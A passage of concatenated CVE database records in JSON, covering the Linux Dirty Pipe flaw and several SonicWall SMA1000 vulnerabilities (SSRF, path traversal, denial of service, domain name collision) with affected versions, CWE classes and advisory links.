        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21623"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21639"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21648"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3541"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15106"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15136"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28469"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26541"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20271"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-29622"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-rel"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21648"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20291"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28500"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15113"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27292"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15114"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22133"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20271"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3114"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15114"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23382"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3636"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22555"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3653"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3656"
      },
      {
        "trust": 0.1,
        "url": "https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce"
      }
    ],
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "db": "PACKETSTORM",
        "id": "163595"
      },
      {
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "db": "PACKETSTORM",
        "id": "163690"
      },
      {
        "db": "PACKETSTORM",
        "id": "164155"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "db": "PACKETSTORM",
        "id": "163595"
      },
      {
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "db": "PACKETSTORM",
        "id": "163690"
      },
      {
        "db": "PACKETSTORM",
        "id": "164155"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-07-20T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "date": "2021-07-21T16:03:37",
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "date": "2021-07-21T16:04:17",
        "db": "PACKETSTORM",
        "id": "163595"
      },
      {
        "date": "2021-07-21T16:04:59",
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "date": "2021-07-21T16:05:35",
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "date": "2021-07-21T16:06:02",
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "date": "2021-07-21T16:07:24",
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "date": "2021-07-20T20:34:00",
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "date": "2021-07-27T14:47:55",
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "date": "2021-07-28T14:53:49",
        "db": "PACKETSTORM",
        "id": "163690"
      },
      {
        "date": "2021-09-14T16:28:49",
        "db": "PACKETSTORM",
        "id": "164155"
      },
      {
        "date": "2021-07-20T19:15:09.747000",
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "date": "2023-11-07T03:35:56.050000",
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163595"
      }
    ],
    "trust": 0.1
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat Security Advisory 2021-2723-01",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163590"
      }
    ],
    "trust": 0.1
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "arbitrary",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163595"
      }
    ],
    "trust": 0.1
  }
}
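The CVE-2021-33909 record above turns on an unsigned-to-signed integer conversion in the Linux virtual file system layer. A minimal user-space sketch of that bug class (illustrative only, not the kernel code path): a size_t-style value just past INT_MAX, reinterpreted as a signed 32-bit int, goes negative and can defeat later bounds checks.

import ctypes

size = 2**31 + 10                  # an unsigned value just past INT_MAX
as_int = ctypes.c_int(size).value  # what a C "int" would see after conversion
print(size, "->", as_int)          # 2147483658 -> -2147483638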

cve-2024-45317
Vulnerability from cvelistv5
Published: 2024-10-11 08:30
Modified: 2024-10-11 15:06
Summary
A Server-Side Request Forgery (SSRF) vulnerability in SMA1000 appliance firmware versions 12.4.3-02676 and earlier allows a remote, unauthenticated attacker to cause the SMA1000 server-side application to make requests to an unintended IP address.
Impacted products
SonicWall SMA1000
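As a generic illustration of the vulnerability class (a sketch, not SMA1000 code): an SSRF arises when a server-side component fetches a client-supplied URL without validating where its hostname resolves, so a remote attacker can steer requests at loopback, link-local, or internal addresses. One common mitigation is to resolve the host first and reject non-public IPs; the function and variable names below are hypothetical.

import ipaddress
import socket
from urllib.parse import urlparse

def is_safe_target(url: str) -> bool:
    """Resolve the URL's host and reject loopback/private/link-local/reserved IPs."""
    host = urlparse(url).hostname
    if host is None:
        return False
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return False
    for info in infos:
        ip = ipaddress.ip_address(info[4][0].split("%")[0])  # drop any IPv6 scope id
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return False
    return True

print(is_safe_target("http://169.254.169.254/"))  # False: link-local metadata address
print(is_safe_target("http://example.com/"))      # True when it resolves to a public IP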


{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:sonicwall:sma1000_firmware:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "sma1000_firmware",
            "vendor": "sonicwall",
            "versions": [
              {
                "lessThan": "12.4.3-02676",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-45317",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-10-11T15:04:24.917758Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-11T15:06:10.975Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unknown",
          "platforms": [
            "Linux"
          ],
          "product": "SMA1000",
          "vendor": "SonicWall",
          "versions": [
            {
              "status": "affected",
              "version": "12.4.3-02676 and earlier versions"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "reporter",
          "value": "Wenjie Zhong (H4lo) of Webin DBappSecurity Co., Ltd."
        }
      ],
      "datePublic": "2024-10-11T08:21:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "A Server-Side Request Forgery (SSRF) vulnerability in SMA1000 appliance firmware versions 12.4.3-02676 and earlier allows a remote, unauthenticated attacker \u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eto cause the SMA1000 server-side application to make requests to an unintended IP address.\u003c/span\u003e"
            }
          ],
          "value": "A Server-Side Request Forgery (SSRF) vulnerability in SMA1000 appliance firmware versions 12.4.3-02676 and earlier allows a remote, unauthenticated attacker to cause the SMA1000 server-side application to make requests to an unintended IP address."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918 Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-10-11T08:30:23.707Z",
        "orgId": "44b2ff79-1416-4492-88bb-ed0da00c7315",
        "shortName": "sonicwall"
      },
      "references": [
        {
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0017"
        }
      ],
      "source": {
        "advisory": "SNWLID-2024-0017",
        "discovery": "EXTERNAL"
      },
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "44b2ff79-1416-4492-88bb-ed0da00c7315",
    "assignerShortName": "sonicwall",
    "cveId": "CVE-2024-45317",
    "datePublished": "2024-10-11T08:30:23.707Z",
    "dateReserved": "2024-08-26T20:20:45.693Z",
    "dateUpdated": "2024-10-11T15:06:10.975Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}
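A note on reading the record above: the CNA lists "12.4.3-02676 and earlier versions" as affected, while the CISA ADP encodes the bound as a strict lessThan on the same string with versionType "custom", so whether the boundary build itself counts as affected differs between the two containers. Below is a sketch of a checker under the assumption that the custom scheme is a dotted release followed by a hyphenated build number; the parsing is an assumption, not documented by the vendor.

def parse(v: str):
    # Assumed layout: "major.minor.patch-build", e.g. "12.4.3-02676".
    release, _, build = v.partition("-")
    return tuple(int(x) for x in release.split(".")) + (int(build or "0"),)

def is_affected(installed: str, last_affected: str = "12.4.3-02676") -> bool:
    # Follows the CNA wording ("and earlier"); the ADP lessThan bound
    # would use a strict comparison instead.
    return parse(installed) <= parse(last_affected)

print(is_affected("12.4.2-01234"))  # True
print(is_affected("12.4.3-02676"))  # True per the CNA; the boundary case per the ADP
print(is_affected("12.4.3-02758"))  # False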

cve-2022-0847
Vulnerability from cvelistv5
Published: 2022-03-07 00:00
Modified: 2024-08-02 23:40
Summary
A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system.
Impacted products
n/akernel
Show details on NVD website
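Before the raw record, a triage aid: public reporting places the introduction of this bug at kernel 5.8 and the fixes in 5.10.102, 5.15.25, and 5.16.11, and the hedged Python sketch below compares a running kernel against those figures. Distribution kernels backport fixes independently of the version string, so treat a "possibly vulnerable" answer as a prompt to consult vendor advisories, not a verdict.

# Hedged triage sketch for CVE-2022-0847 ("Dirty Pipe"): compares the
# running kernel against the publicly reported introduction (5.8) and
# fix releases (5.10.102 / 5.15.25 / 5.16.11). Vendor backports can
# make a pure version check wrong, so treat the result as a hint only.
import platform
import re

FIXED = {(5, 16): (5, 16, 11), (5, 15): (5, 15, 25), (5, 10): (5, 10, 102)}

def kernel_triple(release: str) -> tuple:
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unparseable kernel release: {release}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)

def maybe_vulnerable(release: str) -> bool:
    ver = kernel_triple(release)
    if ver < (5, 8, 0):
        return False  # flaw introduced in 5.8
    fixed = FIXED.get(ver[:2])
    if fixed is not None:
        return ver < fixed
    return ver < (5, 17, 0)  # mainline fix landed before 5.17 final

if __name__ == "__main__":
    rel = platform.release()
    print(rel, "-> possibly vulnerable" if maybe_vulnerable(rel) else "-> likely patched/unaffected")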


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T23:40:04.513Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2060795"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://dirtypipe.cm4all.com/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/166230/Dirty-Pipe-SUID-Binary-Hijack-Privilege-Escalation.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/166229/Dirty-Pipe-Linux-Privilege-Escalation.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/166258/Dirty-Pipe-Local-Privilege-Escalation.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.suse.com/support/kb/doc/?id=000020603"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220325-0005/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0015"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/176534/Linux-4.20-KTLS-Read-Only-Write.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Linux Kernel 5.17 rc6"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A flaw was found in the way the \"flags\" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-665",
              "description": "CWE-665-\u003eCWE-281",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-01-12T16:06:14.073682",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2060795"
        },
        {
          "url": "https://dirtypipe.cm4all.com/"
        },
        {
          "url": "http://packetstormsecurity.com/files/166230/Dirty-Pipe-SUID-Binary-Hijack-Privilege-Escalation.html"
        },
        {
          "url": "http://packetstormsecurity.com/files/166229/Dirty-Pipe-Linux-Privilege-Escalation.html"
        },
        {
          "url": "http://packetstormsecurity.com/files/166258/Dirty-Pipe-Local-Privilege-Escalation.html"
        },
        {
          "url": "https://www.suse.com/support/kb/doc/?id=000020603"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20220325-0005/"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf"
        },
        {
          "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0015"
        },
        {
          "url": "http://packetstormsecurity.com/files/176534/Linux-4.20-KTLS-Read-Only-Write.html"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2022-0847",
    "datePublished": "2022-03-07T00:00:00",
    "dateReserved": "2022-03-03T00:00:00",
    "dateUpdated": "2024-08-02T23:40:04.513Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2020-5129
Vulnerability from cvelistv5
Published: 2020-03-26 03:35
Modified: 2024-08-04 08:22
Summary: A vulnerability in the SonicWall SMA1000 HTTP Extraweb server allows an unauthenticated remote attacker to cause the HTTP server to crash, which leads to a denial of service. This vulnerability affected SMA1000 version 12.1.0-06411 and earlier.
Impacted products: SonicWall SMA1000
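An affected range phrased as "12.1.0-06411 and earlier" invites a mechanical check. The Python sketch below is assumption-laden: it presumes SMA1000 firmware strings follow the major.minor.patch-build shape seen throughout these records and that field-by-field numeric comparison matches SonicWall's actual release ordering.

# Hedged sketch: compare SMA1000-style firmware strings ("12.1.0-06411")
# against the last affected build reported for CVE-2020-5129. The
# "major.minor.patch-build" shape is inferred from the advisory text.
import re

def parse_fw(version: str) -> tuple:
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)-(\d+)", version.strip())
    if not m:
        raise ValueError(f"unexpected firmware format: {version!r}")
    return tuple(int(g) for g in m.groups())

LAST_AFFECTED = parse_fw("12.1.0-06411")

def affected_by_cve_2020_5129(version: str) -> bool:
    return parse_fw(version) <= LAST_AFFECTED

if __name__ == "__main__":
    for v in ("12.1.0-06411", "12.4.3-02676", "12.1.0-00001"):
        print(v, "->", "affected" if affected_by_cve_2020_5129(v) else "not in affected range")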


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T08:22:08.523Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0002"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "SMA1000",
          "vendor": "SonicWall",
          "versions": [
            {
              "status": "affected",
              "version": "12.1.0-06411 and earlier"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability in the SonicWall SMA1000 HTTP Extraweb server allows an unauthenticated remote attacker to cause HTTP server crash which leads to Denial of Service. This vulnerability affected SMA1000 Version 12.1.0-06411 and earlier."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-248",
              "description": "CWE-248: Uncaught Exception",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-03-26T03:35:12",
        "orgId": "44b2ff79-1416-4492-88bb-ed0da00c7315",
        "shortName": "sonicwall"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0002"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "PSIRT@sonicwall.com",
          "ID": "CVE-2020-5129",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "SMA1000",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "12.1.0-06411 and earlier"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "SonicWall"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A vulnerability in the SonicWall SMA1000 HTTP Extraweb server allows an unauthenticated remote attacker to cause HTTP server crash which leads to Denial of Service. This vulnerability affected SMA1000 Version 12.1.0-06411 and earlier."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-248: Uncaught Exception"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0002",
              "refsource": "CONFIRM",
              "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0002"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "44b2ff79-1416-4492-88bb-ed0da00c7315",
    "assignerShortName": "sonicwall",
    "cveId": "CVE-2020-5129",
    "datePublished": "2020-03-26T03:35:12",
    "dateReserved": "2019-12-31T00:00:00",
    "dateUpdated": "2024-08-04T08:22:08.523Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-0126
Vulnerability from cvelistv5
Published: 2023-01-19 00:00
Modified: 2024-08-02 05:02
Summary: A pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2 allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.
Impacted products: SonicWall SMA1000
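The defense implied by this CWE-22 record is standard: canonicalize the requested path against the web root and refuse anything that escapes it. A minimal Python sketch follows; WEB_ROOT is a hypothetical location, and a real server would additionally have to worry about symlinks created after the check.

# Hedged sketch of the standard CWE-22 defense relevant to CVE-2023-0126:
# resolve the requested path under the web root and reject anything that
# escapes it. WEB_ROOT is a hypothetical location for illustration.
from pathlib import Path

WEB_ROOT = Path("/var/www/webroot").resolve()  # hypothetical

def safe_resolve(requested: str) -> Path:
    """Map a client-supplied relative path to a file inside WEB_ROOT."""
    candidate = (WEB_ROOT / requested.lstrip("/")).resolve()
    if WEB_ROOT != candidate and WEB_ROOT not in candidate.parents:
        raise PermissionError(f"path escapes web root: {requested!r}")
    return candidate

if __name__ == "__main__":
    for req in ("index.html", "../../etc/passwd", "css/../admin/../index.html"):
        try:
            print(req, "->", safe_resolve(req))
        except PermissionError as exc:
            print(req, "-> rejected:", exc)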


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T05:02:43.761Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0001"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "SonicWall SMA1000",
          "vendor": "SonicWall",
          "versions": [
            {
              "status": "affected",
              "version": "12.4.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-01-19T00:00:00",
        "orgId": "44b2ff79-1416-4492-88bb-ed0da00c7315",
        "shortName": "sonicwall"
      },
      "references": [
        {
          "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0001"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "44b2ff79-1416-4492-88bb-ed0da00c7315",
    "assignerShortName": "sonicwall",
    "cveId": "CVE-2023-0126",
    "datePublished": "2023-01-19T00:00:00",
    "dateReserved": "2023-01-09T00:00:00",
    "dateUpdated": "2024-08-02T05:02:43.761Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2020-5132
Vulnerability from cvelistv5
Published: 2020-09-30 05:25
Modified: 2024-08-04 08:22
Summary: A misconfiguration in SonicWall SSL-VPN products and the SonicWall firewall SSL-VPN feature leads to a possible DNS flaw known as a domain name collision vulnerability. When users publicly display their organization's internal domain names on the SSL-VPN authentication page, an attacker with knowledge of those internal domain names can potentially take advantage of this vulnerability.
Impacted products: SonicWall SMA100, SMA1000, SonicOS
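Because the weakness is informational (internal domain names shown on a public login page), a first-pass audit can simply ask whether those names also resolve on public DNS, which is the precondition for a name collision. A hedged sketch using only the system resolver; the sample names are placeholders, and results depend on where the check runs.

# Hedged collision check related to CVE-2020-5132: an internal domain
# name exposed on a public SSL-VPN login page is risky if the same name
# can also be resolved on the public Internet.
import socket

def resolves_publicly(name: str) -> bool:
    """True if the name resolves from this host's (public) resolver."""
    try:
        socket.getaddrinfo(name, None)
        return True
    except socket.gaierror:
        return False

if __name__ == "__main__":
    for internal_name in ("corp.example", "intranet.local"):  # placeholders
        hit = resolves_publicly(internal_name)
        print(internal_name, "-> collision risk" if hit else "-> no public resolution")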


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T08:22:08.680Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0006"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "SMA100",
          "vendor": "SonicWall",
          "versions": [
            {
              "status": "affected",
              "version": "SMA100 10.2.0.2-20sv"
            }
          ]
        },
        {
          "product": "SMA1000",
          "vendor": "SonicWall",
          "versions": [
            {
              "status": "affected",
              "version": "SMA1000 12.4.0-2223"
            }
          ]
        },
        {
          "product": "SonicOS",
          "vendor": "SonicWall",
          "versions": [
            {
              "status": "affected",
              "version": "SonicOS 6.5.4.6-79n"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "SonicWall SSL-VPN products and SonicWall firewall SSL-VPN feature misconfiguration leads to possible DNS flaw known as domain name collision vulnerability. When the users publicly display their organization\u2019s internal domain names in the SSL-VPN authentication page, an attacker with knowledge of internal domain names can potentially take advantage of this vulnerability."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-200",
              "description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-09-30T05:25:11",
        "orgId": "44b2ff79-1416-4492-88bb-ed0da00c7315",
        "shortName": "sonicwall"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0006"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "PSIRT@sonicwall.com",
          "ID": "CVE-2020-5132",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "SMA100",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "SMA100 10.2.0.2-20sv"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "SMA1000",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "SMA1000 12.4.0-2223"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "SonicOS",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "SonicOS 6.5.4.6-79n"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "SonicWall"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "SonicWall SSL-VPN products and SonicWall firewall SSL-VPN feature misconfiguration leads to possible DNS flaw known as domain name collision vulnerability. When the users publicly display their organization\u2019s internal domain names in the SSL-VPN authentication page, an attacker with knowledge of internal domain names can potentially take advantage of this vulnerability."
            }
          ]
        },
